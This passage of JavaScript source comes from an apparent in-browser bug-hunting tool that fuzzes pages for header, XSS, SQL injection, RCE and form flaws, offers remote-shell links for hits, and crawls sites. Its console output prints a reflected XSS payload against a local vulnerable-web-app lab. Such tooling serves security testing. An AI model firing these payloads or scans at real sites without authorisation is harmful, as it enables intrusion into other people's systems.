class="accordion-button" type="button" data-bs-toggle="collapse" data-bs-target="#collapse'+accordionNumber+'" aria-expanded="true" aria-controls="collapse'+accordionNumber+'">Headers</button> </h2><div id="collapse'+accordionNumber+'" class="accordion-collapse collapse" aria-labelledby="heading'+accordionNumber+'" data-bs-parent="#accordionExample"><div class="accordion-body">'+htmlEntities(headers).replace(/(?:\r\n|\r|\n)/g,"<br>")+"</div></div></div>",!0===this.headersFuzzerEnabled){console.log("URL Headers Vulnerabilities".toUpperCase());const headers=await testHeaders.call(this);console.log(headers),accordionNumber++,gui+='<div class="accordion-item"><h2 class="accordion-header" id="heading'+accordionNumber+'"> <button class="accordion-button" type="button" data-bs-toggle="collapse" data-bs-target="#collapse'+accordionNumber+'" aria-expanded="true" aria-controls="collapse'+accordionNumber+'">URL Headers Vulnerabilities</button> </h2><div id="collapse'+accordionNumber+'" class="accordion-collapse collapse" aria-labelledby="heading'+accordionNumber+'" data-bs-parent="#accordionExample"><div class="accordion-body">',gui+='<table class="table table-responsive table-hover">',gui+="<tr><th>Url</th><th>HttpMethod</th><th>ParamName</th><th>ParamValue</th><th>PayloadType</th><th>Remote Shell</th></tr>",headers.forEach(v=>{gui+="<tr><td>"+htmlEntities(v.url)+"</td><td>"+htmlEntities(v.httpMethod)+"</td><td>"+htmlEntities(v.paramName)+"</td><td>"+htmlEntities(v.paramValue)+"</td><td>"+htmlEntities(v.payloadType)+"</td><td></td></tr>"}),gui+="</table>",gui+="</div></div></div>"}if(console.log("----------------------------------------------------------------------------"),console.log("\n"),!0===this.xssScanEnabled){console.log("URL XSS Vulnerabilities".toUpperCase());const xss=await testXSS.call(this);console.log(xss),accordionNumber++,gui+='<div class="accordion-item"><h2 class="accordion-header" id="heading'+accordionNumber+'"> <button class="accordion-button" 
type="button" data-bs-toggle="collapse" data-bs-target="#collapse'+accordionNumber+'" aria-expanded="true" aria-controls="collapse'+accordionNumber+'">URL XSS Vulnerabilities</button> </h2><div id="collapse'+accordionNumber+'" class="accordion-collapse collapse" aria-labelledby="heading'+accordionNumber+'" data-bs-parent="#accordionExample"><div class="accordion-body">',gui+='<table class="table table-responsive table-hover">',gui+="<tr><th>Url</th><th>HttpMethod</th><th>ParamName</th><th>ParamValue</th><th>PayloadType</th></tr>",xss.forEach(v=>{gui+="<tr><td>"+htmlEntities(v.url)+"</td><td>"+htmlEntities(v.httpMethod)+"</td><td>"+htmlEntities(v.paramName)+"</td><td>"+htmlEntities(v.paramValue)+"</td><td>"+htmlEntities(v.payloadType)+"</td></tr>"}),gui+="</table>",gui+="</div></div></div>",console.log("Try to test the possible XSS of PHP_SELF in the form"),console.log("If i have http://localhost/Vulnerable-Web-Application-master/XSS/XSS_level5.php?username=&submit=Submit"),console.log('i can run this payload: http://localhost/Vulnerable-Web-Application-master/XSS/XSS_level5.php/"><script>alert(1)<\/script><span class="bho?username=&submit=Submit'),console.log('and my form from this: <form method="GET" action="<?php echo $_SERVER[\'PHP_SELF\']; ?>" name="form">'),console.log('become this: <form method="GET" action="http://localhost/Vulnerable-Web-Application-master/XSS/XSS_level5.php/"><script>alert(1)<\/script><span class="bho" name="form">'),console.log("----------------------------------------------------------------------------"),console.log("\n")}if(!0===this.sqlInjectionScanEnabled){console.log("URL SQL Injection Vulnerabilities".toUpperCase());const sql=await testSqlInjection.call(this);console.log(sql),accordionNumber++,gui+='<div class="accordion-item"><h2 class="accordion-header" id="heading'+accordionNumber+'"> <button class="accordion-button" type="button" data-bs-toggle="collapse" data-bs-target="#collapse'+accordionNumber+'" aria-expanded="true" 
aria-controls="collapse'+accordionNumber+'">URL SQL Injection Vulnerabilities</button> </h2><div id="collapse'+accordionNumber+'" class="accordion-collapse collapse" aria-labelledby="heading'+accordionNumber+'" data-bs-parent="#accordionExample"><div class="accordion-body">',gui+='<table class="table table-responsive table-hover">',gui+="<tr><th>Url</th><th>HttpMethod</th><th>ParamName</th><th>ParamValue</th><th>PayloadType</th><th>Remote Shell</th></tr>",sql.forEach(v=>{gui+="<tr><td>"+htmlEntities(v.url)+"</td><td>"+htmlEntities(v.httpMethod)+"</td><td>"+htmlEntities(v.paramName)+"</td><td>"+htmlEntities(v.paramValue)+"</td><td>"+htmlEntities(v.payloadType)+"</td><td>"+tryRemoteShellLink(v)+"</td></tr>"}),gui+="</table>",gui+="</div></div></div>",console.log("----------------------------------------------------------------------------"),console.log("\n")}if(!0===this.rceScanEnabled){console.log("URL RCE Vulnerabilities".toUpperCase());const rce=await testRCE.call(this);console.log(rce),accordionNumber++,gui+='<div class="accordion-item"><h2 class="accordion-header" id="heading'+accordionNumber+'"> <button class="accordion-button" type="button" data-bs-toggle="collapse" data-bs-target="#collapse'+accordionNumber+'" aria-expanded="true" aria-controls="collapse'+accordionNumber+'">URL RCE Vulnerabilities</button> </h2><div id="collapse'+accordionNumber+'" class="accordion-collapse collapse" aria-labelledby="heading'+accordionNumber+'" data-bs-parent="#accordionExample"><div class="accordion-body">',gui+='<table class="table table-responsive 
table-hover">',gui+="<tr><th>Url</th><th>HttpMethod</th><th>ParamName</th><th>ParamValue</th><th>PayloadType</th></tr>",rce.forEach(v=>{gui+="<tr><td>"+htmlEntities(v.url)+"</td><td>"+htmlEntities(v.httpMethod)+"</td><td>"+htmlEntities(v.paramName)+"</td><td>"+htmlEntities(v.paramValue)+"</td><td>"+htmlEntities(v.payloadType)+"</td></tr>"}),gui+="</table>",gui+="</div></div></div>",console.log("----------------------------------------------------------------------------"),console.log("\n")}if(!0===this.formFuzzingEnabled){console.log("Form Vulnerabilities".toUpperCase());const form=await formLoop.call(this);console.log(form),accordionNumber++,gui+='<div class="accordion-item"><h2 class="accordion-header" id="heading'+accordionNumber+'"> <button class="accordion-button" type="button" data-bs-toggle="collapse" data-bs-target="#collapse'+accordionNumber+'" aria-expanded="true" aria-controls="collapse'+accordionNumber+'">Form Vulnerabilities</button> </h2><div id="collapse'+accordionNumber+'" class="accordion-collapse collapse" aria-labelledby="heading'+accordionNumber+'" data-bs-parent="#accordionExample"><div class="accordion-body">',gui+='<table class="table table-responsive table-hover">',gui+="<tr><th>Url</th><th>HttpMethod</th><th>ParamName</th><th>ParamValue</th><th>PayloadType</th><th>Remote Shell</th></tr>",form.forEach(v=>{gui+="<tr><td>"+htmlEntities(v.url)+"</td><td>"+htmlEntities(v.httpMethod)+"</td><td>"+htmlEntities(v.paramName)+"</td><td>"+htmlEntities(v.paramValue)+"</td><td>"+htmlEntities(v.payloadType)+"</td><td>"+tryRemoteShellLink(v)+"</td></tr>"}),gui+="</table>",gui+="</div></div></div>",console.log("----------------------------------------------------------------------------"),console.log("\n")}console.log("\n"),console.log("----------------------------------------------------------"),console.log("Created by Davide Cavallini"),console.log("Linkedin: 
https://www.linkedin.com/in/davidecavallini/"),guiEnabled(gui)},
// (The fragment above is the tail of the scan routine that begins earlier in this file; it is left untouched.)

/**
 * Hex-encodes the receiver string one UTF-16 code unit at a time.
 * Each code unit is rendered as exactly two hex digits via `("000"+hex).slice(-2)`, so any
 * code unit above 0xFF keeps only its low byte (e.g. U+20AC -> "20ac" -> "ac").
 * Installed on the native String prototype, so it is visible to every script on the page.
 * @returns {string} lowercase hex digits, two per code unit
 */
String.prototype.hexEncode=function(){
  let hex="",result="";
  for(let i=0;i<this.length;i++)
    hex=this.charCodeAt(i).toString(16),result+=("000"+hex).slice(-2);
  return result
},

/**
 * Returns a copy of the receiver with the LAST occurrence of `find` replaced by `replace`.
 * `find` is matched literally (lastIndexOf, no regex semantics). When it does not occur the
 * string is returned unchanged via `this.toString()`.
 * @param {string} find - literal substring to look for
 * @param {string} replace - text substituted for the last occurrence
 * @returns {string}
 */
String.prototype.replaceLast=function(find,replace){
  const index=this.lastIndexOf(find);
  return index>=0?this.substring(0,index)+replace+this.substring(index+find.length):this.toString()
},

/**
 * Fuzzes a caller-described request and renders the findings into the accordion GUI.
 * `manualFuzzerParams` is parsed with JSON.parse and turned into [name, value] pairs, then
 * `fuzzer` (defined elsewhere in this closure — not visible here) is run once against the page
 * parameters and, when the matching flags are set, once more against cookies and once against
 * headers. Each phase resets `result` (so the console shows one phase at a time) while `gui`
 * keeps accumulating, and entries with an undefined paramName are dropped before rendering.
 * Every table cell is passed through htmlEntities() before being concatenated into the report
 * markup. Any thrown error — including malformed JSON — is reported with alert(e).
 * @param {string} manualFuzzerUrl - request URL handed to fuzzer
 * @param {string} manualFuzzerMethod - HTTP method handed to fuzzer
 * @param {string} manualFuzzerParams - JSON object string of parameter name -> value
 * @returns {Promise<void>}
 */
this.manualFuzzer=async function(manualFuzzerUrl,manualFuzzerMethod,manualFuzzerParams){
  try{
    const params=Object.entries(JSON.parse(manualFuzzerParams)),originalParamLength=params.length;
    let result=[];
    // Phase 1: page parameters.
    result=result.concat(await fuzzer.call(this,originalParamLength,manualFuzzerUrl,"pageParams",manualFuzzerMethod,params)),result=result.filter(v=>void 0!==v.paramName),console.log(result);
    let gui="",accordionNumber=0;
    accordionNumber++,gui+='<div class="accordion-item"><h2 class="accordion-header" id="heading'+accordionNumber+'"> <button class="accordion-button" type="button" data-bs-toggle="collapse" data-bs-target="#collapse'+accordionNumber+'" aria-expanded="true" aria-controls="collapse'+accordionNumber+'">Form Vulnerabilities</button> </h2><div id="collapse'+accordionNumber+'" class="accordion-collapse collapse" aria-labelledby="heading'+accordionNumber+'" data-bs-parent="#accordionExample"><div class="accordion-body">',gui+='<table class="table table-responsive table-hover">',gui+="<tr><th>Url</th><th>HttpMethod</th><th>ParamName</th><th>ParamValue</th><th>PayloadType</th><th>Remote Shell</th></tr>",result.forEach(v=>{gui+="<tr><td>"+htmlEntities(v.url)+"</td><td>"+htmlEntities(v.httpMethod)+"</td><td>"+htmlEntities(v.paramName)+"</td><td>"+htmlEntities(v.paramValue)+"</td><td>"+htmlEntities(v.payloadType)+"</td><td></td></tr>"}),gui+="</table>",gui+="</div></div></div>",
    // Phase 2 (optional): cookies. `result` is emptied first; `gui` keeps the section above.
    !0===this.cookiesFuzzerEnabled&&(result=[],result=result.concat(await fuzzer.call(this,originalParamLength,manualFuzzerUrl,"cookiesParams",manualFuzzerMethod,params)),result=result.filter(v=>void 0!==v.paramName),console.log(result),accordionNumber++,gui+='<div class="accordion-item"><h2 class="accordion-header" id="heading'+accordionNumber+'"> <button class="accordion-button" type="button" data-bs-toggle="collapse" data-bs-target="#collapse'+accordionNumber+'" aria-expanded="true" aria-controls="collapse'+accordionNumber+'">Cookies Vulnerabilities</button> </h2><div id="collapse'+accordionNumber+'" class="accordion-collapse collapse" aria-labelledby="heading'+accordionNumber+'" data-bs-parent="#accordionExample"><div class="accordion-body">',gui+='<table class="table table-responsive table-hover">',gui+="<tr><th>Url</th><th>HttpMethod</th><th>ParamName</th><th>ParamValue</th><th>PayloadType</th><th>Remote Shell</th></tr>",result.forEach(v=>{gui+="<tr><td>"+htmlEntities(v.url)+"</td><td>"+htmlEntities(v.httpMethod)+"</td><td>"+htmlEntities(v.paramName)+"</td><td>"+htmlEntities(v.paramValue)+"</td><td>"+htmlEntities(v.payloadType)+"</td><td></td></tr>"}),gui+="</table>",gui+="</div></div></div>"),
    // Phase 3 (optional): headers. Same reset-and-append pattern as the cookies phase.
    !0===this.headersFuzzerEnabled&&(result=[],result=result.concat(await fuzzer.call(this,originalParamLength,manualFuzzerUrl,"headersParams",manualFuzzerMethod,params)),result=result.filter(v=>void 0!==v.paramName),console.log(result),accordionNumber++,gui+='<div class="accordion-item"><h2 class="accordion-header" id="heading'+accordionNumber+'"> <button class="accordion-button" type="button" data-bs-toggle="collapse" data-bs-target="#collapse'+accordionNumber+'" aria-expanded="true" aria-controls="collapse'+accordionNumber+'">Headers Vulnerabilities</button> </h2><div id="collapse'+accordionNumber+'" class="accordion-collapse collapse" aria-labelledby="heading'+accordionNumber+'" data-bs-parent="#accordionExample"><div class="accordion-body">',gui+='<table class="table table-responsive table-hover">',gui+="<tr><th>Url</th><th>HttpMethod</th><th>ParamName</th><th>ParamValue</th><th>PayloadType</th><th>Remote Shell</th></tr>",result.forEach(v=>{gui+="<tr><td>"+htmlEntities(v.url)+"</td><td>"+htmlEntities(v.httpMethod)+"</td><td>"+htmlEntities(v.paramName)+"</td><td>"+htmlEntities(v.paramValue)+"</td><td>"+htmlEntities(v.payloadType)+"</td><td></td></tr>"}),gui+="</table>",gui+="</div></div></div>"),
    // Hand the accumulated markup to the GUI (guiEnabled is defined outside this span).
    guiEnabled(gui)
  }catch(e){alert(e)}
},

/**
 * Crawls outward from the current page and renders every discovered URL as a link table.
 * Starting at document.location.href, the inner `recursion` fetches each URL with $.get,
 * parses the response body with jQuery and follows <a href>, <script src>, <link href>,
 * <img src> and <iframe src>. `urls` doubles as the visited set: a URL is pushed (and then
 * fetched) only when it is not already present. `depth` is incremented on every call but is
 * never compared against a limit, and no same-origin check appears in this function, so the
 * walk is bounded only by the reachable link graph. Failures inside the per-link try blocks
 * are swallowed by empty catch clauses, so unreachable URLs still end up in `urls`.
 * @returns {Promise<string[]>} the discovered URLs, in discovery order
 */
this.spider=async function(){
  const initialUrl=document.location.href,urls=[];
  await recursion(initialUrl,0);
  let gui='<table style="overflow:auto" class="table table-responsive table-striped table-hover">';
  // FIXME(review): unlike the manualFuzzer tables, `v` is interpolated here without htmlEntities(),
  // so a crawled page can place markup into the helper's own report; escape `v` before use.
  return urls.forEach(v=>{gui+='<tr><td><a href="'+v+'" target="_blank">'+v+"</a></td></tr>"}),gui+="</table>",guiEnabled(gui),urls;
  /**
   * Fetches `url`, collects the resource URLs it references and recurses into each new one.
   * @param {string} url - page or resource to fetch
   * @param {number} depth - recursion depth (tracked but unused as a bound)
   * @returns {Promise<void>}
   */
  async function recursion(url,depth){
    // NOTE(review): $(data) builds DOM nodes from an untrusted response body — confirm the jQuery
    // version in use does not evaluate inline scripts from that fragment.
    const data=await $.get(url);
    depth++;
    // Each membership test below is a linear findIndex over `urls` (a Set would make it O(1)).
    for(const tmp of $(data).find("a"))
      if(void 0!==tmp&&void 0!==tmp.href&&-1===urls.findIndex(element=>element===tmp.href)){
        urls.push(tmp.href);
        try{console.log("r",tmp.href),await recursion(tmp.href,depth)}catch(e){}
      }
    for(const tmp of $(data).find("script"))
      if(void 0!==tmp&&void 0!==tmp.src&&-1===urls.findIndex(element=>element===tmp.src)){
        urls.push(tmp.src);
        try{console.log("r",tmp.src),await recursion(tmp.src,depth)}catch(e){}
      }
    for(const tmp of $(data).find("link"))
      if(void 0!==tmp&&void 0!==tmp.href&&-1===urls.findIndex(element=>element===tmp.href)){
        urls.push(tmp.href);
        try{console.log("r",tmp.href),await recursion(tmp.href,depth)}catch(e){}
      }
    for(const tmp of $(data).find("img"))
      if(void 0!==tmp&&void 0!==tmp.src&&-1===urls.findIndex(element=>element===tmp.src)){
        urls.push(tmp.src);
        try{console.log("r",tmp.src),await recursion(tmp.src,depth)}catch(e){}
      }
    for(const tmp of $(data).find("iframe"))
      if(void 0!==tmp&&void 0!==tmp.src&&-1===urls.findIndex(element=>element===tmp.src)){
        urls.push(tmp.src);
        try{console.log("r",tmp.src),await recursion(tmp.src,depth)}catch(e){}
      }
  }
}
}
// Single page-global instance of the helper; `new` without parentheses is valid but unusual.
var jBHH=new JsBugHuntingHelper;